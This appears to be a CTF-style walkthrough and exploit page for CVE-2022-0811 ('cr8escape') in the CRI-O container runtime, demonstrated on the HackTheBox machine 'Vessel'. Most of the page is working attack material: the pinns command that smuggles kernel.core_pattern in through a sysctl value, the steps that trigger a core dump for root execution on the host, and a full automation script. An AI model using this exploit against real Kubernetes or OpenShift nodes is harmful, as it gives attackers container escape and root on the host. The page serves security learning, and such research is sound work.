CVE-2022-0811

CVE-2022-0811 is a vulnerability in CRI-O, the OCI container runtime that Kubernetes (and OpenShift) drive through the Container Runtime Interface. Dubbed "cr8escape" by CrowdStrike, who reported it, the flaw sits in the sysctl handling of pinns, the helper binary CRI-O uses to pin a pod's namespaces. CRI-O joins the sysctls configured for a pod with `+`, and a vulnerable pinns splits on `+` without validating each entry, so a `+` inside the value of an otherwise harmless sysctl smuggles in an arbitrary extra kernel parameter. Setting kernel.core_pattern, which is host-wide rather than namespaced, to a pipe handler turns the next core dump on the node into root code execution on the host. From there an attacker has escaped the container and can run malware, exfiltrate data and move laterally to other pods and nodes. CRI-O versions from 1.19 onward are affected until patched.

Proof-of-Concept

This section documents exploiting CVE-2022-0811 on the HackTheBox machine 'Vessel'.

Prerequisites

The /usr/bin/pinns binary must be setuid root and executable by the attacking user. On Vessel it is owned by root with the SUID bit set and executable by group ethan. (In a real CRI-O deployment the bit is not needed: CRI-O itself runs pinns as root for any pod whose spec sets a sysctl, even a "safe" one such as kernel.shm_rmid_forced; the SUID bit is simply what gives an unprivileged shell user on this box the same code path.)

ethan@vessel:/$ ls -al /usr/bin/pinns
-rwsr-x--- 1 root ethan 814936 Mar 15 18:18 /usr/bin/pinns

CRI-O versions from 1.19 onward are affected until patched; Vessel reports 1.19.6. Treat the version string as a hint only: what matters is whether the installed pinns accepts an unvalidated sysctl list, which the steps below test directly.

ethan@vessel:/$ crio --version
crio version 1.19.6
Version:       1.19.6
GitCommit:     c12bb210e9888cf6160134c7e636ee952c45c05a
GitTreeState:  clean
BuildDate:     2022-03-15T18:18:24Z
GoVersion:     go1.15.2
Compiler:      gc
Platform:      linux/amd64
Linkmode:      dynamic

Exploitation Steps

Step 1: Create a Container

This rootless runc container is where the core dump is triggered in Step 3. Bind-mounting the host's / over the container's / means /tmp/poc and /tmp/out are the same files inside and outside the container. The root@runc prompt is only the rootless user namespace mapping ethan to uid 0 inside the container; it carries no privilege on the host.

## Create the runc bundle and an (empty) rootfs; the bind mount below supplies the real filesystem
ethan@vessel:/$ mkdir /tmp/pthree
ethan@vessel:/$ mkdir /tmp/pthree/rootfs

## Generate a rootless runc spec (config.json) in the bundle directory
ethan@vessel:/tmp/pthree$ runc spec --rootless

## Add this entry to the 'mounts' array of config.json: the host's / becomes the container's /
{
  "type": "bind",
  "source": "/",
  "destination": "/",
  "options": [
    "rbind",
    "rw",
    "rprivate"
  ]
},

## Start the container
ethan@vessel:/tmp/pthree$ runc run privesc

root@runc:/# hostname
runc

Step 2: Create and Execute Exploit Script

Create the script that the kernel will run as root on the next core dump. Each command gets its own redirection, because `whoami && hostname >> /tmp/out` would only redirect the output of hostname, and the file must be executable for the kernel's usermode helper to run it:

ethan@vessel:/tmp$ cat poc
#!/bin/sh
whoami >> /tmp/out
hostname >> /tmp/out
ethan@vessel:/tmp$ chmod +x poc

Run pinns with the injected sysctl list. The value of kernel.shm_rmid_forced contains a `+`, so a vulnerable pinns splits out a second entry, kernel.core_pattern, and writes it to /proc/sys as root. The kernel splits a pipe handler on spaces, so the trailing `#` is merely passed to /tmp/poc as an argument, which the script ignores:

ethan@vessel:/tmp$ /usr/bin/pinns -d /tmp/pthree -f privesc -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/poc #' --ipc --net --uts

Verify that pinns accepted the request: it creates one directory per pinned namespace under the -d path, and /proc/sys/kernel/core_pattern, readable by any user, should now contain the injected pipe handler:

# ls -al /tmp/pthree
total 24
drwxrwxr-x  5 root   root    4096 Sep  2 09:07 .
drwxrwxrwt 17 nobody nogroup 4096 Sep  2 09:03 ..
-rw-rw-r--  1 root   root    2893 Sep  2 08:59 config.json
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 netns
drwxrwxr-x  2 root   root    4096 Sep  2 08:58 rootfs
drwxr-xr-x  2 nobody root    4096 Sep  2 09:07 utsns

Step 3: Trigger Core Dump

In the runc container, start a background process and send it SIGSEGV. Handling the dump, the kernel pipes the core to /tmp/poc, which runs as root in the host's namespaces. The ulimit is belt and braces: for a pipe handler the kernel ignores the core size limit, except for the special value 1, which disables piping.

root@runc:/# ulimit -c unlimited
root@runc:/# tail -f /dev/null &
[1] 32
root@runc:/# kill -SIGSEGV 32
root@runc:/# ps
    PID TTY          TIME CMD
      1 pts/0    00:00:00 sh
     18 pts/0    00:00:00 bash
     33 pts/0    00:00:00 ps
[1]+  Segmentation fault      (core dumped) tail -f /dev/null

Step 4: Verify Successful Execution

ethan@vessel:/tmp/pthree$ cat /tmp/out 
root
vessel

whoami returned root and hostname returned vessel rather than runc: the script ran as root on the host, outside the container.
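The script below is an added example, not code from the original writeup or from the CRI-O project, that folds the `+`-splitting described in the introduction, the Prerequisites check and Steps 2 to 4 into one POSIX sh file. It keeps the page's paths (/tmp/pthree, /tmp/poc, /tmp/out) and pin-file name (privesc); the function names, the CR8_RUN guard, the use of `uname -n` in place of `hostname` in the hook, and triggering the core dump directly on the host instead of inside the runc container from Step 1 are this example's own choices (the last works because kernel.core_pattern is a global, non-namespaced parameter).

```sh
#!/bin/sh
# Added example (not from the original writeup or from CRI-O): the page's
# manual steps as one script. Paths, pin-file name and hook script follow the
# walkthrough; the CR8_RUN guard is an assumption of this example. The live
# steps (pinns, core dump) run only when CR8_RUN=1; the helpers are inert.
set -u

PINNS=/usr/bin/pinns    # setuid-root pinns, must be executable by us
PINDIR=/tmp/pthree      # pinns -d: directory that receives the pinned namespace files
PINNAME=privesc         # pinns -f: file name used for each pinned namespace
HOOK=/tmp/poc           # script the kernel runs as root on the next core dump
OUT=/tmp/out            # proof file written by the hook

# CRI-O joins sysctl pairs with '+', and a vulnerable pinns splits on '+'
# without checking that each value is free of separators. A '+' inside the
# value of a harmless sysctl therefore smuggles in a second key: here
# kernel.core_pattern, which is host-wide, not namespaced. The kernel splits
# the handler line on spaces, so the trailing '#' is just an ignored argument.
sysctl_payload() {
    printf 'kernel.shm_rmid_forced=1+kernel.core_pattern=|%s #' "$1"
}

# What the vulnerable parser sees: one key=value per line.
split_sysctls() {
    printf '%s\n' "$1" | tr '+' '\n'
}

# Write the hook. Each command has its own redirection so both lines land in
# the proof file ('a && b >> f' would only redirect b). uname -n == hostname.
write_hook() {
    printf '#!/bin/sh\nwhoami >> %s\nuname -n >> %s\n' "$2" "$2" > "$1"
    chmod 755 "$1"
}

# Preflight matching the Prerequisites: setuid bit, root owner, executable by us.
pinns_usable() {
    [ -u "$1" ] && [ -x "$1" ] && [ "$(stat -c %u "$1" 2>/dev/null)" = 0 ]
}

# Step 2: let pinns write the smuggled kernel.core_pattern. Which namespaces
# are pinned is irrelevant; pinns only needs something to pin.
inject_core_pattern() {
    mkdir -p "$PINDIR"
    write_hook "$HOOK" "$OUT"
    "$PINNS" -d "$PINDIR" -f "$PINNAME" -s "$(sysctl_payload "$HOOK")" --ipc --net --uts
    echo "core_pattern is now: $(cat /proc/sys/kernel/core_pattern)"   # expect '|/tmp/poc #'
}

# Step 3: any process dumping core now makes the kernel run $HOOK as root in
# the host's namespaces. The page does this inside its runc container; a dump
# on the host works just as well because the parameter is global.
trigger_core_dump() {
    ulimit -c unlimited
    sh -c 'kill -SEGV $$' || true     # the child dies with SIGSEGV; that is the point
}

# Step 4: the hook wrote 'root' and the host name if it ran as root on the host.
verify() {
    [ -f "$OUT" ] && cat "$OUT"
}

if [ "${CR8_RUN:-0}" = 1 ]; then
    pinns_usable "$PINNS" || { echo "$PINNS is not setuid root or not executable by $(whoami)" >&2; exit 1; }
    echo "sysctls as pinns will parse them:"; split_sysctls "$(sysctl_payload "$HOOK")"
    inject_core_pattern
    trigger_core_dump
    sleep 1     # give the usermode helper a moment to finish writing $OUT
    verify
fi
```

Run it as the user who can execute pinns with `CR8_RUN=1 sh cr8escape.sh`; without the variable it only defines the helpers, so it can be sourced to inspect the payload with split_sysctls. Reading /proc/sys/kernel/core_pattern after the pinns call is the quickest confirmation that the injection landed, and the same file is what a defender auditing a node should be watching.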

Disclaimer

All content published on exploit.se is intended strictly for educational and informational purposes. Research is conducted responsibly under coordinated disclosure principles.

Techniques, tools, and writeups shared on this site are meant to advance the security community's understanding of vulnerabilities and defences. They are not intended to encourage or enable unauthorised access to any system.

The author bears no responsibility for any misuse of information presented here.
